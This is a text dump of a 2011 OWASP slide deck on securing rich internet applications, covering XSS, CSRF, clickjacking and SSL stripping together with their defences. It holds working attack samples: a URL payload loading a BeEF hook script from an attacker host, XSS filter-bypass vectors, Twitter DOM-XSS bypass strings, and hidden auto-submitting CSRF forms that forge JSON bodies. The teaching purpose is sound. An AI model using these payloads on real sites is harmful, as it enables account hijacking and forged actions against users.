Application Security for RIAs

John Wilander, & OWASP

Wednesday, November 2, 2011

Frontend developer atSvenska Handelsbanken

Researcher in application security

Co-leader OWASP Sweden

OWASP == The Open Web Application Security Project

Cheat sheets, tools, code, guidelines

https://owasp.org

@johnwilander

johnwilander.com (music)

Wednesday, November 2, 2011

ÅåÄäÖö

Wednesday, November 2, 2011

OWASP Top 10Top web applicationsecurity risks 2010

Wednesday, November 2, 2011

1. Injection2. Cross-Site Scripting (XSS)3. Broken Authentication and Session

Management4. Insecure Direct Object References5. Cross-Site Request Forgery (CSRF)6. Security Misconfiguration7. Insecure Cryptographic Storage8. Failure to Restrict URL Access9. Insufficient Transport Layer Protection10.Unvalidated Redirects and Forwards

Wednesday, November 2, 2011

”Do I have to care?”

Wednesday, November 2, 2011

From: WhiteHat Website Security Statistic Report, Winter 2011

Likelihood of ≥ 1 vulnerability on your site

Wednesday, November 2, 2011

Per extension

.asp .aspx .do .jsp .php

Sites having had ≥ 1serious vulnerability

74 % 73 % 77 % 80 % 80 %

Sites currently having ≥ 1serious vulnerability

57 % 58 % 56 % 59 % 63 %

From: WhiteHat Website Security Statistic Report, Spring 2010Wednesday, November 2, 2011

But we’re moving towards more

code client-side

Wednesday, November 2, 2011

From: IBM X-Force 2011 Mid-Year Trend and Risk Report

Client-Side, JavaScript Vulnerabilities

Wednesday, November 2, 2011

From: IBM X-Force 2011 Mid-Year Trend and Risk Report

Client-Side, JavaScript Vulnerabilities

Wednesday, November 2, 2011

• Cross-Site Scripting (XSS)• Cross-Site Request Forgery (CSRF)

• Clickjacking• Man-In-the-Middle SSL

Focus Today

Wednesday, November 2, 2011

XSS ...the hack that keeps on hacking

Wednesday, November 2, 2011

Cross-Site ScriptingTheory

Cross-Site

Scripting

Wednesday, November 2, 2011

Cross-Site ScriptingType 1, reflected

Cross-Site

Scripting

Phising

Wednesday, November 2, 2011

Cross-Site ScriptingType 2, stored

Cross-Site

Wednesday, November 2, 2011

Cross-Site ScriptingType 2, stored

Scripting

Wednesday, November 2, 2011

Cross-Site ScriptingType 0, DOM-based

Cross-Site

Scripting

Phising

Wednesday, November 2, 2011

Cross-Site ScriptingType 0, DOM-based

Phising

Cross-Site

Scripting

No server roundtrip!

Also, single-page interfacesmake injected scripts ”stick”in the DOM.

Wednesday, November 2, 2011

https://secure.bank.com/authentication#language=sv&country=SE

Wednesday, November 2, 2011

https://secure.bank.com/authentication#language=sv&country=SE

Never sent to server

Be careful when you usethis data on your page

Wednesday, November 2, 2011

https://secure.bank.com/authentication#language=<script src="http://attackr.se:

3000/hook.js"></script>&country=SE

Would you click this?

Wednesday, November 2, 2011

https://secure.bank.com/authentication#language=%3Cscript%20src%3D%22http%3A%2F%2Fattackr.se%3A3000%2Fhook.js%22%3E%3C

%2Fscript%3E&country=SE

Would you click this?

Wednesday, November 2, 2011

http://bit.ly/Yg4T32

Would you click this?

Wednesday, November 2, 2011

Filter out <script>?

http://docs.sencha.com/ext-js/4-0/#!/api/Ext.util.Format-method-stripScripts

/** * Strips all script tags * @param {Object} value The text from which to strip script tags * @return {String} The stripped text */stripScripts : function(v) { return !v ? v : String(v).replace(stripScriptsRe, "");},

var ... , stripScriptsRe = /(?:<script.*?>)((\n|\r|.)*?)(?:<\/script>)/ig,

Wednesday, November 2, 2011

Filter out <script>?<img src=1 onerror=alert(1)>

<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>

<body onload=alert('XSS')>

<table background="javascript:alert('XSS')">

¼script¾alert(¢XSS¢)¼/script¾

<video poster=javascript:alert(1)//

Wednesday, November 2, 2011

”C’mon, such attacks don’t really work,

do they?”

Yep, demo.

Wednesday, November 2, 2011

DOM-Based XSSTwitter September 2010

Full story athttp://blog.mindedsecurity.com/2010/09/twitter-domxss-wrong-fix-and-something.html

Wednesday, November 2, 2011

(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a; }})(window);

Wednesday, November 2, 2011

(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a; }})(window);

What does this code do?

Wednesday, November 2, 2011

(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a; }})(window);

”https://twitter.com/#!/johnwilander”.split(”#!”)[1]returns”/johnwilander”

Wednesday, November 2, 2011

(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a; }})(window);

”https://twitter.com/#!/johnwilander”.split(”#!”)[1]returns”/johnwilander”

window.location = ”/johnwilander”initial ’/’ => keeps the domain but changes the path

Wednesday, November 2, 2011

(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a; }})(window);

”https://twitter.com/#!/johnwilander”.split(”#!”)[1]returns”/johnwilander”

window.location = ”/johnwilander”initial ’/’ => keeps the domain but changes the path

Sotwitter.com/#!/johnwilanderbecomestwitter.com/johnwilander

Read more: http://kotowicz.net/absolute/

Wednesday, November 2, 2011

http://twitter.com/#!javascript:alert(document.domain);

Wednesday, November 2, 2011

http://twitter.com/#!javascript:alert(document.domain);

Never sent to server=> DOM-based XSS

Wednesday, November 2, 2011

var c = location.href.split("#!")[1];if (c) { window.location = c.replace(":", "");} else { return true;}

The Patch™

Wednesday, November 2, 2011

var c = location.href.split("#!")[1];if (c) { window.location = c.replace(":", "");} else { return true;}

Replaces the first occuranceof the search string

The Patch™

Wednesday, November 2, 2011

http://twitter.com/#!javascript::alert(document.domain);

Wednesday, November 2, 2011

http://twitter.com/#!javascript::alert(document.domain);

Wednesday, November 2, 2011

(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a.replace(/:/gi,""); }})(window);

The 2nd Patch™

Wednesday, November 2, 2011

(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a.replace(/:/gi,""); }})(window); Regexp pattern

delimiters

Wednesday, November 2, 2011

(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a.replace(/:/gi,""); }})(window);

Global match

Regexp patterndelimiters

Wednesday, November 2, 2011

(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a.replace(/:/gi,""); }})(window);

Global match Ignore case

Regexp patterndelimiters

Wednesday, November 2, 2011

Were they done now?

Wednesday, November 2, 2011

http://twitter.com#!javascript&x58;alert(1)

Wednesday, November 2, 2011

http://twitter.com#!javascript&x58;alert(1)

HTML entity version of ’:’

Wednesday, November 2, 2011

(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location.pathname = a; }})(window);

The n:th Patch™(this one works)

And hey, Twitter is doing the right thing: https://twitter.com/about/security

Wednesday, November 2, 2011

Fix these issues properly with ...

Client-Side Encoding

Wednesday, November 2, 2011

https://github.com/chrisisbeef/jquery-encoder• $.encoder.canonicalize()

Throws Error for double encoding or multiple encoding types, otherwise transforms %3CB%3E to <b>

• $.encoder.encodeForCSS()Encodes for safe usage in style attribute and style()

• $.encoder.encodeForHTML()Encodes for safe usage in innerHTML and html()

• $.encoder.encodeForHTMLAttribute()Encodes for safe usage in HTML attributes

• $.encoder.encodeForJavaScript()Encodes for safe usage in event handlers etc

• $.encoder.encodeForURL()Encodes for safe usage in href etc

Wednesday, November 2, 2011

https://github.com/chrisisbeef/jquery-encoder• $.encoder.canonicalize()

Throws Error for double encoding or multiple encoding types, otherwise transforms %3CB%3E to <b>

• $.encoder.encodeForCSS()Encodes for safe usage in style attribute and style()

• $.encoder.encodeForHTML()Encodes for safe usage in innerHTML and html()

• $.encoder.encodeForHTMLAttribute()Encodes for safe usage in HTML attributes

• $.encoder.encodeForJavaScript()Encodes for safe usage in event handlers etc

• $.encoder.encodeForURL()Encodes for safe usage in href etc

Wednesday, November 2, 2011

Let’s do a short demo of that

Wednesday, November 2, 2011

Also, check out ...

Content Security Policyhttp://people.mozilla.com/~bsterne/

content-security-policy/

Wednesday, November 2, 2011

Only allow scripts from whitelisted domainsandonly allow scripts from files, i.e. no inline scripts

New HTTP Response Header Saying ...

Wednesday, November 2, 2011

'self' = same URL, protocol and port

X-Content-Security-Policy: default-src 'self'Accept all content including scripts only from my own URL+port

X-Content-Security-Policy: default-src *; script-src trustedscripts.foo.com Accept media only from my URL+port (images, stylesheets, fonts, ...) and scripts only from trustedscripts.foo.com

Wednesday, November 2, 2011

CSRFmy current favorite!

Wednesday, November 2, 2011

Cross-Site Request Forgery

Cross-Site

Request Forgery

Wednesday, November 2, 2011

Cross-Site Request Forgery

Cross-Site

Request Forgery

Phising

Wednesday, November 2, 2011

<img src=”https://secure.bank.com/logo.png" />

Is www.attackr.se allowed toload images like this:

?

Wednesday, November 2, 2011

<img src=”https://secure.bank.com/authentication#language=sv&country=SE" />

?

Is www.attackr.se allowed toload images like this:

Wednesday, November 2, 2011

<img src=”https://secure.bank.com/authentication#language=sv&country=SE"

height=0 width=0 />

With image tags www.attackr.se can silentlysend HTTP GET requests to any domain

Wednesday, November 2, 2011

”Will restricting to HTTP POST save me?”

Wednesday, November 2, 2011

What’s on your mind? What’s on your mind?POST POST

Wednesday, November 2, 2011

I love OWASP!

What’s on your mind? What’s on your mind?POST POST

Wednesday, November 2, 2011

I love OWASP!

What’s on your mind? What’s on your mind?POST POST

John: I love OWASP!

Wednesday, November 2, 2011

What’s on your mind? What’s on your mind?POST POST

Wednesday, November 2, 2011

What’s on your mind?I hate OWASP!

What’s on your mind?POST POST

Wednesday, November 2, 2011

What’s on your mind?I hate OWASP!

What’s on your mind?POST POST

Wednesday, November 2, 2011

What’s on your mind?I hate OWASP!

What’s on your mind?POST POST

John: I hate OWASP!

Wednesday, November 2, 2011

What’s on your mind? What’s on your mind?POST

John: I hate OWASP!

<form id="target" method="POST" action="https://1-liner.org/form"> <input type="text" value="I hate OWASP!" name="oneLiner"/> <input type="submit" value="POST"/></form>

<script type="text/javascript"> $(document).ready(function() { $('#form').submit(); });</script>

Wednesday, November 2, 2011

What’s on your mind? What’s on your mind?POST

John: I hate OWASP!

<form id="target" method="POST" action="https://1-liner.org/form"> <input type="text" value="I hate OWASP!" name="oneLiner"/> <input type="submit" value="POST"/></form>

<script> $(document).ready(function() { $('#target').submit(); });</script>

Wednesday, November 2, 2011

There used to be a protection in web 1.5

Wednesday, November 2, 2011

Forced Browsingwizard-style

Shipment info ✉

Next

Payment info $

Buy!

Wednesday, November 2, 2011

Forced Browsingwizard-style

Next Buy!

Token

Shipment info ✉ Payment info $

Wednesday, November 2, 2011

Forced Browsingwizard-style

Token 1 Token 2 Token 3

Token 3 Wednesday, November 2, 2011

Forced Browsingwizard-style

Token 1 Token 2 Token 3

State built up i steps, server roundtrip in-between

Token 3 Wednesday, November 2, 2011

Forced Browsingwizard-style

Token 1 Token 2 Token 3

Token 3

Couldn’t forge

request to

last ste

p

without a

valid token

Wednesday, November 2, 2011

But in RIAs ...

Wednesday, November 2, 2011

RIA & client-side state

{”purchase”: {}}

Wednesday, November 2, 2011

RIA & client-side state

{”purchase”: { ”items”: [{}] }}

Wednesday, November 2, 2011

RIA & client-side state

{”purchase”: { ”items”: [{},{}] }}

Wednesday, November 2, 2011

RIA & client-side state

{”purchase”: { ”items”: [{},{}], ”shipment”: {} }}

Wednesday, November 2, 2011

RIA & client-side state

{”purchase”: { ”items”: [{},{}], ”shipment”: {}, ”payment”: {} }}

Wednesday, November 2, 2011

RIA & client-side state

{”purchase”: { ”items”: [{},{}], ”shipment”: {}, ”payment”: {} }}

Wednesday, November 2, 2011

Can an attacker forge such a JSON structure?

Wednesday, November 2, 2011

CSRF possible?

{”purchase”: { ”items”: [{},{}], ”shipment”: {}, ”payment”: {} }}

Wednesday, November 2, 2011

<form id="target" method="POST" action="https://vulnerable.1-liner.org: 8444/ws/oneliners">

<input type="text" name=”” value="" />

<input type="submit" value="Go" />

</form>

Wednesday, November 2, 2011

<form id="target" method="POST" action="https://vulnerable.1-liner.org: 8444/ws/oneliners" style="visibility:hidden">

<input type="text" name=”” value="" />

<input type="submit" value="Go" />

</form>

Wednesday, November 2, 2011

<form id="target" method="POST" action="https://vulnerable.1-liner.org: 8444/ws/oneliners" style="visibility:hidden" enctype="text/plain">

<input type="text" name=”” value="" />

<input type="submit" value="Go" />

</form>

Wednesday, November 2, 2011

<form id="target" method="POST" action="https://vulnerable.1-liner.org: 8444/ws/oneliners" style="visibility:hidden" enctype="text/plain">

<input type="text" name=”” value="" />

<input type="submit" value="Go" />

</form>

Forms produce a request body that looks like this:

theName=theValue

... and that’s not valid JSON.

Wednesday, November 2, 2011

<form id="target" method="POST" action="https://vulnerable.1-liner.org: 8444/ws/oneliners" style="visibility:hidden" enctype="text/plain">

<input type="text" name='{"id": 0, "nickName": "John", "oneLiner": "I hate OWASP!", "timestamp": "20111006"}//' value="dummy" />

<input type="submit" value="Go" />

</form>

Wednesday, November 2, 2011

<form id="target" method="POST" action="https://vulnerable.1-liner.org: 8444/ws/oneliners" style="visibility:hidden" enctype="text/plain">

<input type="text" name='{"id": 0, "nickName": "John", "oneLiner": "I hate OWASP!", "timestamp": "20111006"}//' value="dummy" />

<input type="submit" value="Go" />

</form>

Produces a request body that looks like this:

{"id": 0, "nickName": "John","oneLiner": "I hate OWASP!","timestamp": "20111006"}//=dummy

... and that is acceptable JSON!

Wednesday, November 2, 2011

Demo POST CSRF against REST service

Wednesday, November 2, 2011

Demo XSS + CSRF with

The Browser Exploitation Frameworkhttp://beefproject.com/

Wednesday, November 2, 2011

Important in yourREST API

• Restrict HTTP method, e.g. POSTEasier to do CSRF with GET

• Restrict to AJAX if applicableX-Requested-With:XMLHttpRequestCross-domain AJAX prohibited by default

• Restrict media type(s), e.g. application/jsonHTML forms only allow URL encoded, multi-part and text/plain

Wednesday, November 2, 2011

Attacker may spoof headers via Flash proxy

http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-February/007533.html

Wednesday, November 2, 2011

Double Submit

Wednesday, November 2, 2011

Double Submit(CSRF protection)

Anti-CSRF valueas cookie ...

... andrequest parameter

Wednesday, November 2, 2011

Double Submit(CSRF protection)

Cannot read theanti-CSRF cookie toinclude it as parameter

cookie ≠request parameter

Wednesday, November 2, 2011

Double Submit(CSRF protection)

Anti-CSRF cookie canbe generated client-side=> no server-side state

Wednesday, November 2, 2011

How To Get It Right

• Join your local OWASP chapterhttps://www.owasp.org/index.php/OWASP_Chapter

• Start following these fellas on Twitter:@WisecWisec @0x6D6172696F @garethheyes @internot_ @securityninja @jeremiahg @kkotowicz @webtonull @manicode @_mwc

• Start hacking – it’s fun!Best place to start? Your own apps of course.Just stay legal ;)

Wednesday, November 2, 2011

@johnwilanderjohn.wilander@owasp.org

http://appsandsecurity.blogspot.com

Wednesday, November 2, 2011

Clickjacking and MItMif there’s time

Wednesday, November 2, 2011

Clickjacking Demo

Wednesday, November 2, 2011

X-Frame-Optionshttp://blogs.msdn.com/b/ie/archive/2009/01/27/ie8-security-part-vii-

clickjacking-defenses.aspxhttp://tools.ietf.org/html/draft-

gondrom-frame-options-01

Wednesday, November 2, 2011

No page can load me in an iframeoronly my own domain can load me in an iframe

Wednesday, November 2, 2011

X-Frame-Options: DENY

X-Frame-Options: SAMEORIGIN

(Coming:X-Frame-Options: ALLOW-FROM [list])

Wednesday, November 2, 2011

MItM Demo

Wednesday, November 2, 2011

Moxie’s SSL Strip

Terminates SSL

Changes https to http

Normal https to the server

Acts as client

http https

Wednesday, November 2, 2011

Moxie’s SSL Striphttp https

Secure cookie?

Encoding, gzip?

Cached content?

Ongoing sessions?

Wednesday, November 2, 2011

Moxie’s SSL Strip

Strip secure attribute off all cookies

Strip off all request encodings

Strip off all if-modified-since in request

302 back to same page, set-cookie expired

http https

Secure cookie?

Encoding, gzip?

Cached content?

Ongoing sessions?

Wednesday, November 2, 2011

SSL Strip & Torlogin.yahoo.com

GmailHotmail

PayPal

11450139

In 24 h

Tor node

Tor node

Tor nodeTor nodeTor node

Tor exit node with SSL Strip

Wednesday, November 2, 2011

HTTP Strict Transport Security

http://tools.ietf.org/html/draft-ietf-websec-strict-transport-sec-02

Wednesday, November 2, 2011

Require SSL without warnings for X seconds aheadandpotentially do the same for my subdomains too

Wednesday, November 2, 2011

Strict-Transport-Security: max-age=86400

Strict-Transport-Security: max-age=86400; includeSubdomains

Wednesday, November 2, 2011

W3C Web Application Security Working Grouphttp://www.w3.org/2011/webappsec/

Wednesday, November 2, 2011